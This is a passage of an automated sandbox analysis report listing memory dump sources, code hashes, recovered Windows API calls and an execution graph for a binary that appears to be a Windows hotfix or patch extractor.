                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d9f84ed33e04a50cc75d73480d86f3b8f11bbc8851e627dfa954f843364c247
                                                                                              • Instruction ID: 47a47e7724101b81cf1e1fdd9477815481a0082b8eb6285e44efc0e7966f3570
                                                                                              • Opcode Fuzzy Hash: 3d9f84ed33e04a50cc75d73480d86f3b8f11bbc8851e627dfa954f843364c247
                                                                                              • Instruction Fuzzy Hash: 24B1A735D082959FDB0BCF18C4946EDBBB0BF45310F19C6AFD8969B286C7709685CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3974dae9ebb7a8bc4aa2b7da6efc4464a47bfbc8cab31630611c404ab64ff985
                                                                                              • Instruction ID: 734c5ffc2d1f5eaf6f1fdea0ab5366f13342bdfd70bcbe669edc26b63f45a8e5
                                                                                              • Opcode Fuzzy Hash: 3974dae9ebb7a8bc4aa2b7da6efc4464a47bfbc8cab31630611c404ab64ff985
                                                                                              • Instruction Fuzzy Hash: 8F910630A0459A9EEB1BDF58C8887FEB3B1BB44708F5080AED98D961C2C7749985CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: adc727b130d8a70c901193652c7c29f7f7098ede988ec518b009589487b1a216
                                                                                              • Instruction ID: 4a48d19044e3ec236ddfe2700c74ad1dffc8538b678a9b9864d77caf5e4adf83
                                                                                              • Opcode Fuzzy Hash: adc727b130d8a70c901193652c7c29f7f7098ede988ec518b009589487b1a216
                                                                                              • Instruction Fuzzy Hash: 23610531A0055A8FEF1ACF6CC4905BEB7A2EBC9344F15856DD9DAD7382DA309952CB80
                                                                                              APIs
                                                                                              • LoadStringA.USER32(20000005,?,00000104), ref: 01003EEA
                                                                                              • SHBrowseForFolderA.SHELL32(?), ref: 01003F2B
                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 01003F3D
                                                                                              • SendDlgItemMessageA.USER32(?,0000006C,0000000C,00000000,?), ref: 01003F54
                                                                                              • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 01003F5F
                                                                                              • SendDlgItemMessageA.USER32(?,0000006C,0000000D,00000104,?), ref: 01003F84
                                                                                              • LoadStringA.USER32(20000005,?,00000104), ref: 01003FB0
                                                                                              • SendMessageA.USER32(?,0000000C,00000000,?), ref: 01003FC3
                                                                                              • SendDlgItemMessageA.USER32(?,00000067,0000000C,00000000,?), ref: 01003FDC
                                                                                              • SendDlgItemMessageA.USER32(?,0000006C,0000000C,00000000,c:\36a8a8e2fed651ec27d1eed188bb35), ref: 01003FE9
                                                                                              • EndDialog.USER32(?,00000000), ref: 01003FF0
                                                                                              Strings
                                                                                              • c:\36a8a8e2fed651ec27d1eed188bb35, xrefs: 01003FDE
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$LoadString$BrowseDialogFolderFromListPath
                                                                                              • String ID: c:\36a8a8e2fed651ec27d1eed188bb35
                                                                                              APIs
                                                                                              • SetParent.USER32(?,000000FD), ref: 01002E8C
                                                                                              • Sleep.KERNEL32(000001F4), ref: 01002E9C
                                                                                              • SetEvent.KERNEL32 ref: 01002EA8
                                                                                              • SetEvent.KERNEL32 ref: 01002EBD
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,Global\HotfixNoShutDown), ref: 01002ECC
                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01002EEF
                                                                                              • CloseHandle.KERNEL32(?), ref: 01002EF8
                                                                                              • TerminateProcess.KERNEL32(00000320,00000001), ref: 01002F0F
                                                                                              • EndDialog.USER32(?,00000000), ref: 01002F27
                                                                                              Strings
                                                                                              • Global\HotfixNoShutDown, xrefs: 01002EC3
                                                                                              Similarity
                                                                                              • API ID: Event$CloseCreateDialogHandleMultipleObjectsParentProcessSleepTerminateWait
                                                                                              • String ID: Global\HotfixNoShutDown
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0100367A
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 0100369F
                                                                                              • GetProcAddress.KERNEL32(00000000,GetFilePatchSignatureA), ref: 010036BA
                                                                                              • GetProcAddress.KERNEL32(ApplyPatchToFileA), ref: 010036CC
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: ApplyPatchToFileA$GetFilePatchSignatureA$c:\36a8a8e2fed651ec27d1eed188bb35$mspatcha.dll$options$patchdll
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(0100D060,?,?,?,01003914), ref: 01002D82
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,01003914), ref: 01002D98
                                                                                              • CloseHandle.KERNEL32(0000030C,?,?,?,01003914), ref: 01002DAC
                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,01003914), ref: 01002DD0
                                                                                              • GetLastError.KERNEL32(?,?,?,01003914), ref: 01002DDA
                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 01002DF1
                                                                                              • RemoveDirectoryA.KERNEL32(?,?,?,?,01003914), ref: 01002E12
                                                                                              • GetLastError.KERNEL32(?,?,?,01003914), ref: 01002E1C
                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 01002E33
                                                                                              • LeaveCriticalSection.KERNEL32(0100D060,?,?,?,01003914), ref: 01002E44
                                                                                              Similarity
                                                                                              • API ID: File$CloseCriticalErrorHandleLastMoveSection$DeleteDirectoryEnterLeaveRemove
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(76F92EE0,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200,?), ref: 010033E4
                                                                                              • SetFilePointer.KERNEL32(FFFFFFFF,00000000,00000000,00000002,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200), ref: 010033FD
                                                                                              • WriteFile.KERNEL32(?,?,00000000,00000000,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200), ref: 01003427
                                                                                              • WriteFile.KERNEL32(***,***,00000000,00000000,?,?,?,?,?,010034CC,?,?,?,010038D5,?,?), ref: 0100344E
                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200,?), ref: 0100345B
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: File$ErrorLastWrite$Pointer
                                                                                              • String ID: ***
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AttributesFile_stricmpsprintfstrrchr
                                                                                              • String ID: .%03u$.sys
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32 ref: 010038A6
                                                                                              • LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                              • MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                              • DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                              • ExitProcess.KERNEL32 ref: 01003935
                                                                                              Similarity
                                                                                              • API ID: CriticalDeleteErrorExitLastLoadMessageProcessSectionString
                                                                                              • String ID:
                                                                                              • API String ID: 3880362259-0
                                                                                              • Opcode ID: 0930090407c2940a87bd685511672d1101a90b25c2312edca6e979305b6cca41
                                                                                              • Instruction ID: 95fc673a3485858558866d3e75a01873537341b781b9074dca4c1e746b7b8f2d
                                                                                              • Opcode Fuzzy Hash: 0930090407c2940a87bd685511672d1101a90b25c2312edca6e979305b6cca41
                                                                                              • Instruction Fuzzy Hash: C2018435401118AFFB73EBA4DD8CBE977B8BB04315F140295FAC0A60C4DB795A48CBA1
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 010062A9
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 010062B5
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 010062BD
                                                                                              • GetTickCount.KERNEL32 ref: 010062C5
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 010062D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              • Opcode ID: 9f9a8a372e71f4ba5fd6d590d704713b28d7a18848ebf7ccacbe1fec22a7f2bd
                                                                                              • Instruction ID: cb9998d7c512c76f87658832ca3486ab159dbae6228a0cd13093ddd9b699de7a
                                                                                              • Opcode Fuzzy Hash: 9f9a8a372e71f4ba5fd6d590d704713b28d7a18848ebf7ccacbe1fec22a7f2bd
                                                                                              • Instruction Fuzzy Hash: 00F03C36D002189BEB22EBF8E44C59AB7F9EF0C310F4106A1F591E7146DB3AE900CB80
                                                                                              APIs
                                                                                              • SetFilePointer.KERNEL32(0000030C,00000000,00000000,00000000), ref: 0100283D
                                                                                              • ReadFile.KERNEL32(Sdwn,00000314,?,00000000), ref: 01002859
                                                                                              • _snprintf.MSVCRT ref: 0100289F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$PointerRead_snprintf
                                                                                              • String ID: Sdwn
                                                                                              • API String ID: 1063975976-2102837186
                                                                                              • Opcode ID: cbd71d36e9f98fb81e9e7a2f7e14d0f9a5e3fb102f12bd1d6d3dfab898bb688e
                                                                                              • Instruction ID: 9dcb7796340e3617a47c656186b8592bb183c83f9254e4a58000cb69e97ca3b5
                                                                                              • Opcode Fuzzy Hash: cbd71d36e9f98fb81e9e7a2f7e14d0f9a5e3fb102f12bd1d6d3dfab898bb688e
                                                                                              • Instruction Fuzzy Hash: F311A176501344ABF7338768AA8DB623BD8A706374F1403D9F5D1A20DAC37A4B84C379

                                                                                              Execution Graph

                                                                                              Execution Coverage:12.2%
                                                                                              Dynamic/Decrypted Code Coverage:2.9%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:1531
                                                                                              Total number of Limit Nodes:36
72785->72782 80499 6c91b059 80500 6c91b064 80499->80500 80501 6c91b069 80499->80501 80513 6c91e588 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 80500->80513 80505 6c91af5e 80501->80505 80504 6c91b077 80506 6c91af6a _flsall 80505->80506 80510 6c91b007 _flsall 80506->80510 80511 6c91afb7 ___DllMainCRTStartup 80506->80511 80514 6c91adf5 80506->80514 80508 6c91afe7 80509 6c91adf5 __CRT_INIT@12 149 API calls 80508->80509 80508->80510 80509->80510 80510->80504 80511->80508 80511->80510 80512 6c91adf5 __CRT_INIT@12 149 API calls 80511->80512 80512->80508 80513->80501 80515 6c91ae01 _flsall 80514->80515 80516 6c91ae83 80515->80516 80517 6c91ae09 80515->80517 80519 6c91aee4 80516->80519 80522 6c91ae89 80516->80522 80566 6c91e1d6 HeapCreate 80517->80566 80520 6c91aee9 80519->80520 80524 6c91af42 80519->80524 80581 6c91d21f TlsGetValue _DecodePointerInternal TlsSetValue 80520->80581 80521 6c91ae0e 80526 6c91ae19 80521->80526 80533 6c91ae12 _flsall 80521->80533 80523 6c91aea7 80522->80523 80522->80533 80576 6c91dacb 66 API calls _doexit 80522->80576 80529 6c91aebb 80523->80529 80577 6c91dd4c 67 API calls _free 80523->80577 80524->80533 80584 6c91d524 79 API calls __freefls@4 80524->80584 80567 6c91d597 86 API calls 4 library calls 80526->80567 80580 6c91aece 70 API calls __mtterm 80529->80580 80531 6c91aeee 80582 6c91d761 66 API calls __calloc_crt 80531->80582 80533->80511 80534 6c91ae1e __RTC_Initialize 80538 6c91ae22 80534->80538 80545 6c91ae2e GetCommandLineA 80534->80545 80537 6c91aefa 80537->80533 80540 6c91af06 _DecodePointerInternal 80537->80540 80568 6c91e1f9 HeapDestroy 80538->80568 80539 6c91aeb1 80578 6c91d258 70 API calls _free 80539->80578 80546 6c91af1b 80540->80546 80543 6c91ae27 80543->80533 80544 6c91aeb6 80579 6c91e1f9 HeapDestroy 80544->80579 80569 6c91e0e4 71 API calls 2 library calls 80545->80569 80549 6c91af36 80546->80549 80550 6c91af1f 80546->80550 80553 6c91be0e _free 66 API calls 80549->80553 
80583 6c91d29a 66 API calls 4 library calls 80550->80583 80551 6c91ae3e 80570 6c91db02 73 API calls __calloc_crt 80551->80570 80553->80543 80555 6c91af26 GetCurrentThreadId 80555->80533 80556 6c91ae48 80557 6c91ae4c 80556->80557 80572 6c91e024 95 API calls 3 library calls 80556->80572 80571 6c91d258 70 API calls _free 80557->80571 80560 6c91ae58 80561 6c91ae6c 80560->80561 80573 6c91dda4 94 API calls 6 library calls 80560->80573 80561->80543 80575 6c91dd4c 67 API calls _free 80561->80575 80564 6c91ae61 80564->80561 80574 6c91d8cf 77 API calls 4 library calls 80564->80574 80566->80521 80567->80534 80568->80543 80569->80551 80570->80556 80571->80538 80572->80560 80573->80564 80574->80561 80575->80557 80576->80523 80577->80539 80578->80544 80579->80529 80580->80533 80581->80531 80582->80537 80583->80555 80584->80533 80585 63965dee 80586 63965e11 80585->80586 80591 63960900 80586->80591 80587 63965e7a SetWindowLongW 80588 63965e6c 80587->80588 80592 63960915 80591->80592 80593 63960937 80591->80593 80594 6396092d 80592->80594 80599 63963e60 80592->80599 80593->80587 80593->80588 80594->80593 80612 639609a0 80594->80612 80600 63963e6c __EH_prolog3 80599->80600 80622 639570f9 GetDlgItem 80600->80622 80660 63956615 CreateWindowExW SetWindowPos 80600->80660 80601 63963e73 SetWindowLongW 80661 6394ff14 EnumChildWindows 80601->80661 80604 63963eae GetParent SendMessageW 80606 63963ee4 _receive_impl 80604->80606 80607 63963ecc GetParent GetDesktopWindow 80604->80607 80606->80594 80666 6394e153 GetWindowLongW 80607->80666 80608 63963ead 80608->80604 80613 6396096e 80612->80613 80614 639609ad 80612->80614 80613->80593 80616 63965cd1 80613->80616 80614->80613 80923 63963ef9 80614->80923 80621 63965cde 80616->80621 80617 63965d7b 80617->80593 80618 63965d86 SendMessageW 80618->80617 80619 63965cea 80619->80617 80619->80618 80620 63965d66 GetDlgItem 80620->80619 80621->80617 80621->80619 80621->80620 80686 6395671f 80622->80686 80624 63957142 GetDlgItem 80729 6394edae 80624->80729 
80627 6394edae 4 API calls 80628 63957172 80627->80628 80629 63957187 SetDlgItemTextW 80628->80629 80630 6395717c ShowWindow 80628->80630 80734 6394ede8 80629->80734 80630->80629 80635 6394ede8 8 API calls 80636 63957201 80635->80636 80740 63956abd GetDlgItem 80636->80740 80639 63956abd 15 API calls 80640 6395722e 80639->80640 80749 639609e0 80640->80749 80660->80601 80910 6394ffce 80661->80910 80667 6394e182 80666->80667 80668 6394e19f GetWindowRect 80666->80668 80671 6394e193 GetWindow 80667->80671 80672 6394e189 GetParent 80667->80672 80669 6394e1b4 80668->80669 80670 6394e228 GetParent GetClientRect GetClientRect MapWindowPoints 80668->80670 80674 6394e1c4 MonitorFromWindow 80669->80674 80675 6394e1b8 GetWindowLongW 80669->80675 80679 6394e20f SetWindowPos 80670->80679 80673 6394e19d 80671->80673 80672->80673 80673->80668 80677 6394e1e4 80674->80677 80678 6394e1eb GetMonitorInfoW 80674->80678 80675->80674 80682 639687c1 _wcsupr_s_l_stat 5 API calls 80677->80682 80678->80677 80680 6394e201 80678->80680 80679->80677 80680->80679 80683 6394e21b GetWindowRect 80680->80683 80684 6394e2da 80682->80684 80683->80679 80684->80606 80685 63968e26 66 API calls 2 library calls 80685->80608 80687 6395672b __EH_prolog3 80686->80687 80688 63951e75 110 API calls 80687->80688 80689 63956734 PathIsRelativeW 80688->80689 80690 6395675e 80689->80690 80701 6395674f ctype 80689->80701 80691 639683fd ctype 67 API calls 80690->80691 80692 63956768 80691->80692 80693 6395f21d 68 API calls 80692->80693 80695 6395677d 80693->80695 80694 63956928 80827 6394c9bb 67 API calls 3 library calls 80694->80827 80697 6395f21d 68 API calls 80695->80697 80699 63956787 PathFileExistsW PathFileExistsW 80697->80699 80698 63956932 80828 6394cb96 98 API calls 3 library calls 80698->80828 80699->80701 80702 6395679b 80699->80702 80701->80694 80704 639567a5 ctype 80701->80704 80822 6395ea8d 98 API calls ctype 80702->80822 80705 63967f22 5 API calls 80704->80705 80707 6395681d 80705->80707 80706 6395694a 
ctype 80829 6394d1b4 67 API calls 3 library calls 80706->80829 80708 639568bd 80707->80708 80710 6395e8e8 ctype 107 API calls 80707->80710 80815 63950b11 80708->80815 80713 63956833 80710->80713 80712 639568af 80826 6396dbdb RaiseException 80712->80826 80715 6395f143 98 API calls 80713->80715 80719 6395684a 80715->80719 80717 63956905 CloseHandle 80718 6395690d 80717->80718 80821 63960324 SendMessageW 80718->80821 80823 6394ca39 107 API calls 3 library calls 80719->80823 80722 63956916 80723 63956920 _receive_impl 80722->80723 80724 6395691b CloseHandle 80722->80724 80723->80624 80724->80723 80725 6395685b ctype 80824 6394cac2 98 API calls 3 library calls 80725->80824 80727 63956881 ctype 80825 6394d170 67 API calls 4 library calls 80727->80825 80834 6396547b 80729->80834 80732 6394edc1 SetWindowTextW 80733 6394edcb GetDlgItem 80732->80733 80733->80627 80735 6394ee0f 80734->80735 80736 6394ee80 80735->80736 80737 6394ee32 GetWindowPlacement MapDialogRect SetWindowPlacement 80735->80737 80840 639687c1 80736->80840 80737->80736 80739 6394ee8c SetDlgItemTextW 80739->80635 80741 6396547b 3 API calls 80740->80741 80742 63956adb 80741->80742 80743 63956ae5 ShowWindow EnableWindow 80742->80743 80744 63956af9 80742->80744 80745 63956b0e 80743->80745 80746 6394ede8 8 API calls 80744->80746 80747 63956b15 SendMessageW 80745->80747 80748 63956b24 80745->80748 80746->80745 80747->80748 80748->80639 80849 639726ce 80749->80849 80751 639609ec SendMessageW 80752 6395e8e8 ctype 107 API calls 80751->80752 80753 63960a1f 80752->80753 80754 6395e8e8 ctype 107 API calls 80753->80754 80760 63960a35 ctype 80754->80760 80755 63960e39 ctype 80850 63972722 80755->80850 80758 63960cfc 80758->80755 80761 63960d9f MapDialogRect 80758->80761 80759 63960ae2 MapDialogRect 80759->80760 80760->80758 80760->80759 80766 63960b20 ctype 80760->80766 80772 63960c20 LoadImageW 80760->80772 80777 63960c9a LoadImageW 80760->80777 80762 639691b7 77 API calls 80761->80762 80763 63960db8 80762->80763 80764 
63960dbd 80763->80764 80859 63964454 80764->80859 80766->80760 80780 639683fd ctype 67 API calls 80766->80780 80853 63964782 109 API calls 80766->80853 80854 6395f8de CreateWindowExW 80766->80854 80855 6394f589 70 API calls 2 library calls 80766->80855 80857 6395f8de CreateWindowExW 80766->80857 80858 6395f933 SendMessageW 80766->80858 80770 63960b63 ShowWindow SendMessageW 80770->80766 80772->80760 80774 63960c3b 80772->80774 80856 6395f8de CreateWindowExW 80774->80856 80776 63960c64 SendMessageW 80776->80760 80777->80760 80777->80766 80780->80766 80816 63950b1a 80815->80816 80830 6394e2e1 80816->80830 80819 63950b27 SetWindowLongW 80820 63950b37 SendMessageW 80819->80820 80820->80717 80820->80718 80821->80722 80822->80704 80823->80725 80824->80727 80825->80712 80826->80708 80827->80698 80828->80706 80829->80712 80831 6394e2ef 80830->80831 80832 6394e2fb GetCurrentProcess FlushInstructionCache 80830->80832 80831->80832 80833 6394e329 80831->80833 80832->80833 80833->80819 80833->80820 80835 63965484 80834->80835 80836 6394e2e1 2 API calls 80835->80836 80837 6396548c 80836->80837 80838 63965494 SetWindowLongW 80837->80838 80839 6394edb8 80837->80839 80838->80839 80839->80732 80839->80733 80841 639687cb IsDebuggerPresent 80840->80841 80842 639687c9 80840->80842 80848 6396f0b7 80841->80848 80842->80739 80845 6396af10 SetUnhandledExceptionFilter UnhandledExceptionFilter 80846 6396af35 GetCurrentProcess TerminateProcess 80845->80846 80847 6396af2d __call_reportfault 80845->80847 80846->80739 80847->80846 80848->80845 80849->80751 80851 639687c1 _wcsupr_s_l_stat 5 API calls 80850->80851 80852 6397272c 80851->80852 80852->80852 80853->80766 80854->80770 80855->80766 80856->80776 80857->80766 80858->80766 80860 63964466 80859->80860 80871 6396528b 80860->80871 80865 63964800 80866 6396480b 80865->80866 80869 63960d1a 80865->80869 80867 63964822 80866->80867 80904 639683ce RaiseException ctype __CxxThrowException@8 80866->80904 80867->80869 80870 63968eaa __recalloc 70 API 
calls 80867->80870 80869->80755 80869->80758 80870->80869 80872 639652a2 80871->80872 80874 63964481 80871->80874 80873 639652b1 EnterCriticalSection 80872->80873 80872->80874 80875 639652c7 80873->80875 80876 639653da LeaveCriticalSection 80873->80876 80889 639663d4 80874->80889 80877 639652ce GetClassInfoExW 80875->80877 80878 6396533f LoadCursorW 80875->80878 80876->80874 80879 6396531e 80877->80879 80880 639652f7 GetClassInfoExW 80877->80880 80878->80879 80882 63965387 GetClassInfoExW 80879->80882 80898 63969136 97 API calls swprintf 80879->80898 80880->80879 80881 6396530c LeaveCriticalSection 80880->80881 80881->80874 80882->80876 80884 639653ae RegisterClassExW 80882->80884 80886 639653cf 80884->80886 80887 639653c1 80884->80887 80885 63965381 80885->80882 80886->80876 80899 6395e876 71 API calls 2 library calls 80887->80899 80890 6394e2e1 2 API calls 80889->80890 80891 639663e9 80890->80891 80892 639663ed SetLastError 80891->80892 80893 639663f9 80891->80893 80894 63960e00 SendMessageW ShowWindow 80892->80894 80893->80894 80900 63967dd2 80893->80900 80894->80865 80896 63966408 CreateWindowExW 80896->80894 80898->80885 80899->80886 80901 63967dd6 80900->80901 80902 63967e09 RaiseException 80900->80902 80901->80902 80903 63967dda GetCurrentThreadId EnterCriticalSection LeaveCriticalSection 80901->80903 80903->80896 80911 6394ff2d 80910->80911 80914 6394ffe9 80910->80914 80915 6395007b 80911->80915 80914->80911 80921 639683ce RaiseException ctype __CxxThrowException@8 80914->80921 80916 63950096 SetWindowPos 80915->80916 80917 6395008c 80915->80917 80916->80917 80918 6394ff32 80916->80918 80920 639500d1 SetWindowPos 80917->80920 80922 639683ce RaiseException ctype __CxxThrowException@8 80917->80922 80918->80604 80918->80685 80920->80917 80920->80918 80924 63963f1e 80923->80924 80925 63963f0b GetParent 80923->80925 80926 63963f16 80924->80926 80927 63963f45 80924->80927 80928 63963f35 80924->80928 80929 63963f51 80924->80929 80925->80924 80925->80926 
80926->80613 80966 63964870 130 API calls 3 library calls 80927->80966 80935 6395757c 80928->80935 80929->80926 80932 63963f61 80929->80932 80967 6394fed9 SendMessageW 80932->80967 80934 63963f7b 80934->80926 80936 63957588 __EH_prolog3 80935->80936 80937 63957597 80936->80937 80938 6395759c 80936->80938 81006 639512ab 6 API calls ctype 80937->81006 80940 6395e8e8 ctype 107 API calls 80938->80940 80944 63957624 80938->80944 80941 639575b9 80940->80941 81007 6394c9bb 67 API calls 3 library calls 80941->81007 80943 639575ca ctype 81008 6394c9f6 67 API calls ctype 80943->81008 80945 63957679 GetParent 80944->80945 80947 6395764a GetParent SendMessageW 80944->80947 80968 6394f415 80945->80968 80953 6395775b _receive_impl 80947->80953 80953->80926 80954 639575e5 ctype 81009 6394d1b4 67 API calls 3 library calls 80954->81009 80956 639683fd ctype 67 API calls 80959 639576bc 80956->80959 80957 63957616 81010 6396dbdb RaiseException 80957->81010 80960 639683fd ctype 67 API calls 80959->80960 80961 639576e3 80960->80961 80994 6395fb4f 80961->80994 80963 639576f3 SendMessageW 80964 63957726 SetWindowLongW GetParent SetWindowTextW PostMessageW 80963->80964 80965 63957716 KiUserCallbackDispatcher 80963->80965 80964->80953 80965->80964 80966->80926 80967->80934 80969 6394f426 80968->80969 81011 6394f24c GetDlgItem 80969->81011 80971 6394f432 80972 6394f24c 5 API calls 80971->80972 80973 6394f447 80972->80973 80974 6394f24c 5 API calls 80973->80974 80975 6394f45c 80974->80975 80976 6394f24c 5 API calls 80975->80976 80977 6394f471 GetDlgItem GetWindowLongW 80976->80977 80978 6394f494 80977->80978 80979 6394f4b1 80978->80979 80980 6394f49f 80978->80980 80982 6394f4ca 80979->80982 80983 6394f4b5 80979->80983 80981 6394f4a3 80980->80981 80980->80982 81018 6394f527 7 API calls _wcsupr_s_l_stat 80981->81018 80988 639577a9 80982->80988 81019 6394f527 7 API calls _wcsupr_s_l_stat 80983->81019 80986 6394f4ad SetWindowLongW 80986->80982 80990 639577b4 SendMessageW 80988->80990 80991 
